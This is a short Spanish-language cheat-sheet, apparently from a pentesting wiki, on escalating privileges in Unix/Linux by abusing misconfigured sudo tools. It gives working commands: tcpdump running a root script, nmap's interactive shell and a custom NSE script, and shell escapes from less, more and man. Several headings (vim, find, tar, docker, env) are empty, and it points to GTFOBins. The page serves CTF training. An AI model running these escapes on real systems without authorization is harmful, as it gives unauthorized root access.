System Tools Exploitation

Explotación de herramientas del sistema mal configuradas para escalar privilegios en sistemas Unix/Linux.

Estas técnicas no son teóricas: se han usado en múltiples CTFs reales y entornos reales, incluyendo plataformas como TryHackMe, HackTheBox y máquinas de VulnHub.


🧲 tcpdump

sudo tcpdump -i lo -w /dev/null -W 1 -G 1 -z /tmp/root.sh

🌐 nmap

# If interactive mode is enabled
sudo nmap --interactive
!sh
# With custom NSE script
sudo nmap --script=/tmp/root.nse

📖 less, more, man

# Open a file with less, then type:
!sh

✏️ vim, vi, nano


🔍 find


🗜️ tar



🐳 docker / podman


🧬 env, nice, ionice, flock, script


Mas binarios en: https://gtfobins.github.ioarrow-up-right

Última actualización